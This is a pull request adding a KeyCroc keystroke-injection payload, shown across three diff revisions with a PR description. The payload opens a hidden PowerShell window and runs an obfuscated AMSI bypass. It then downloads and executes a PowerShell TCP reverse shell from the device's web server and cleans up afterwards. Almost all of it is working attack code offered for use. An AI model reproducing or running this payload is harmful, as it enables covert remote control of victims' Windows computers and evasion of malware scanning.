### PR TITLE
Create win_psh_rev_shell.txt

### DIFF
--- a/library/exploit/win_psh_rev_shell.txt
+++ b/library/exploit/win_psh_rev_shell.txt
@@ -1,0 +1,34 @@
+# Title: Powershell reverse shell to the KeyCroc
+# Author: cerebro11 
+# Date: 25/07/2020
+# Following commands should be ran on the KeyCroc before running payload: 
+#     1) "cd /tmp/www && python3 -m http.server &"
+#     2) "nc -nvlp 4444"
+
+MATCH __croc_revshell
+
+# Step 1 : Change to ETHERNET ATTACKMODE (Windows)
+VENDOR=$(cat /tmp/vidpid | cut -d: -f1)
+PRODUCT=$(cat /tmp/vidpid | cut -d: -f2)
+ATTACKMODE HID RNDIS_ETHERNET VID_0X$VENDOR PID_0X$PRODUCT
+QUACK DELAY 5000
+
+# Step 2 : Get KeyCroc's LAN IP
+croc_ip=$(ifconfig usb0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)
+
+# Step 3 : Inject KeyStrokes
+QUACK GUI
+QUACK DELAY 2
+# 3.1 : Run Powershell
+QUACK STRING "powershell.exe"
+QUACK ENTER
+QUACK DELAY 2
+# 3.2 : Bypass AMSI
+QUACK STRING "[Ref].Assembly.GetType('Sy'+'stem.Managem'+'ent.Aut'+'omation.Am'+'s'+'iUt'+'ils').GetField('a'+'m'+'si'+'In'+'itFa'+'iled','No'+'nPub'+'lic,Static').SetValue(\$null,\$true)"
+QUACK ENTER
+# 3.3 : Create TCP Revershell Oneliner file
+mkdir /tmp/www
+echo "\$client = New-Object System.Net.Sockets.TCPClient('${croc_ip}',4444);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2  = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" > /tmp/www/Invoke-PowerShellTcpOneLine.ps1
+# 3.4 : Spawn Reverse Shell
+QUACK STRING "IEX (New-Object Net.WebClient).DownloadString('http://${croc_ip}:8000/Invoke-PowerShellTcpOneLine.ps1');"
+QUACK ENTER

--- a/library/exploit/win_psh_rev_shell.txt
+++ b/library/exploit/win_psh_rev_shell.txt
@@ -1,19 +1,18 @@
 # Title: PshRevShell
-# Description: A fileless Powershell reverse shell to the KeyCroc
+# Description: A fileless PowerShell reverse shell to the KeyCroc
 # Author: cerebro11 
 # Date: 28/07/2020
 # 
-# A netcat Listener should be ran on the KeyCroc before running payload "nc -nvlp 4444"
-# Requirements : gohttp
+# A netcat listener should be ran on the KeyCroc before executing the payload (ex: "nc -nvlp 4444")
+# Requirements: gohttp
 
 MATCH __croc_revshell
 
-LED SETUP
-
-# Step 0 : Specify target's PC keyboard language
+# Step 0: Specify target's PC keyboard language
 #export DUCKY_LANG=fr
 
-# Step 1 : Change to ETHERNET ATTACKMODE (Windows)
+# Step 1: Change to ETHERNET ATTACKMODE (Windows)
+LED SETUP
 if [ ! -f "/tmp/vidpid" ]
 then
         ATTACKMODE RNDIS_ETHERNET HID VID_0X1234 PID_0X5678
@@ -24,17 +23,16 @@ else
 fi
 QUACK DELAY 5000
 
-# Step 2 : Get KeyCroc's LAN IP
+# Step 2: Get KeyCroc's LAN IP
 croc_ip=$(ifconfig usb0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)
 croc_port=4444
 
-# Step 3 : Prepare scripts and run web service
+# Step 3: Prepare scripts and run web service
 mkdir -p /tmp/www
 echo "\$client = New-Object System.Net.Sockets.TCPClient('${croc_ip}',${croc_port});\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2  = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" > /tmp/www/Invoke-PowerShellTcpOneLine.ps1
-
 cd /tmp/www/ && gohttp -p 80 &
 
-# Step 3 : Inject KeyStrokes to bypass AMSI and spawn reverse shell
+# Step 4: Inject KeyStrokes to bypass AMSI and spawn reverse shell
 LED ATTACK
 QUACK LOCK
 QUACK GUI-r
@@ -48,7 +46,7 @@ QUACK STRING "IEX (New-Object Net.WebClient).DownloadString('http://${croc_ip}/I
 QUACK ENTER
 QUACK UNLOCK
 
-# Step 4 : Clean
+# Step 5: Clean
 LED CLEAN
 sleep 10
 kill $(ps -C "gohttp -p 80" -o pid --no-headers)

--- a/library/exploit/win_psh_rev_shell.txt
+++ b/library/exploit/win_psh_rev_shell.txt
@@ -1,34 +1,57 @@
-# Title: Powershell reverse shell to the KeyCroc
+# Title: PshRevShell
+# Description: A fileless Powershell reverse shell to the KeyCroc
 # Author: cerebro11 
-# Date: 25/07/2020
-# Following commands should be ran on the KeyCroc before running payload: 
-#     1) "cd /tmp/www && python3 -m http.server &"
-#     2) "nc -nvlp 4444"
+# Date: 28/07/2020
+# 
+# A netcat Listener should be ran on the KeyCroc before running payload "nc -nvlp 4444"
+# Requirements : gohttp
 
 MATCH __croc_revshell
 
+LED SETUP
+
+# Step 0 : Specify target's PC keyboard language
+#export DUCKY_LANG=fr
+
 # Step 1 : Change to ETHERNET ATTACKMODE (Windows)
-VENDOR=$(cat /tmp/vidpid | cut -d: -f1)
-PRODUCT=$(cat /tmp/vidpid | cut -d: -f2)
-ATTACKMODE HID RNDIS_ETHERNET VID_0X$VENDOR PID_0X$PRODUCT
+if [ ! -f "/tmp/vidpid" ]
+then
+        ATTACKMODE RNDIS_ETHERNET HID VID_0X1234 PID_0X5678
+else
+        VENDOR=$(cat /tmp/vidpid | cut -d: -f1)
+        PRODUCT=$(cat /tmp/vidpid | cut -d: -f2)
+        ATTACKMODE RNDIS_ETHERNET HID VID_0X$VENDOR PID_0X$PRODUCT
+fi
 QUACK DELAY 5000
 
 # Step 2 : Get KeyCroc's LAN IP
 croc_ip=$(ifconfig usb0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)
+croc_port=4444
 
-# Step 3 : Inject KeyStrokes
-QUACK GUI
-QUACK DELAY 2
-# 3.1 : Run Powershell
-QUACK STRING "powershell.exe"
+# Step 3 : Prepare scripts and run web service
+mkdir -p /tmp/www
+echo "\$client = New-Object System.Net.Sockets.TCPClient('${croc_ip}',${croc_port});\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2  = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" > /tmp/www/Invoke-PowerShellTcpOneLine.ps1
+
+cd /tmp/www/ && gohttp -p 80 &
+
+# Step 3 : Inject KeyStrokes to bypass AMSI and spawn reverse shell
+LED ATTACK
+QUACK LOCK
+QUACK GUI-r
+QUACK DELAY 20
+QUACK STRING "powershell -NoP -NonI -W Hidden -Exec Bypass"
 QUACK ENTER
-QUACK DELAY 2
-# 3.2 : Bypass AMSI
+QUACK DELAY 20
 QUACK STRING "[Ref].Assembly.GetType('Sy'+'stem.Managem'+'ent.Aut'+'omation.Am'+'s'+'iUt'+'ils').GetField('a'+'m'+'si'+'In'+'itFa'+'iled','No'+'nPub'+'lic,Static').SetValue(\$null,\$true)"
 QUACK ENTER
-# 3.3 : Create TCP Revershell Oneliner file
-mkdir /tmp/www
-echo "\$client = New-Object System.Net.Sockets.TCPClient('${croc_ip}',4444);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2  = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" > /tmp/www/Invoke-PowerShellTcpOneLine.ps1
-# 3.4 : Spawn Reverse Shell
-QUACK STRING "IEX (New-Object Net.WebClient).DownloadString('http://${croc_ip}:8000/Invoke-PowerShellTcpOneLine.ps1');"
+QUACK STRING "IEX (New-Object Net.WebClient).DownloadString('http://${croc_ip}/Invoke-PowerShellTcpOneLine.ps1')"
 QUACK ENTER
+QUACK UNLOCK
+
+# Step 4 : Clean
+LED CLEAN
+sleep 10
+kill $(ps -C "gohttp -p 80" -o pid --no-headers)
+rm -rf /tmp/www/
+
+LED FINISH


### PR DESCRIPTION
Payload that spawns a reverse shell on Windows Targets directly onto the KeyCroc.
Revshell uses PowerShell's inject into memory. No files are created on target system. 

Steps of the payloads are as follow : 
1) Step 1 : Change ATTACKMODE to RNDIS_ETHERNET
2) Step 2 : Recover IP of KeyCroc
3) Step 3 : Inject keystrokes to : 
a) Run powershell
b) Bypass AMSI
c) Create Revshell Onliner file locally 
d) Spawn Shell